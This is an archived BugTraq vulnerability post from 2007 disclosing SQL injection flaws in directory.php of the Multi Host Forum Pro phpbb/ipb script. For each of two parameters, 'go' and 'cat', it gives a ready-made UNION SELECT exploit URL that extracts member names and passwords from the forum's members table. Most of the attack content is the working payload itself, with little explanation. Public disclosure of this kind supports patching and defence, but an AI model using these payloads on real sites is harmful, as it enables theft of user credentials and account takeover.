BugTraq
Multi Host Forum Pro phpbb & ipb Multiple Sql Injection Oct 25 2007 09:31PM
kingoftheworld92 fastwebnet it
---------------------------------------------------------------

____ __________ __ ____ __

/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_

| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __ | | | \ | |/ \ \___| | /_____/ | || |

|___|___| /\__| /______ /\___ >__| |___||__|

\/\______| \/ \/

---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Multi Host Forum Pro phpbb & ipb Multiple Sql Injection

---------------------------------------------------------------

# Discovered by KiNgOfThEwOrLd

---------------------------------------------------------------

Corrupted Page: directory.php

Corrupted Variable: ?go=

PoC: An attacker can get some infos from your database. The query result, may be a cookie value.

Exploit: directory.php?go=-1+union+select+1,concat(name,0x3a,password),3+from+[fo
rum]_members+where+id=[id]

---------------------------------------------------------------

Corrupted Page: directory.php

Corrupted Variable: ?cat=

PoC: An attacker can get some infos from your database.

Exploit: directory.php?cat=-1+union+select+1,concat(name,0x3a,password),3+from+[f
orum]_members+where+id=[id]

---------------------------------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus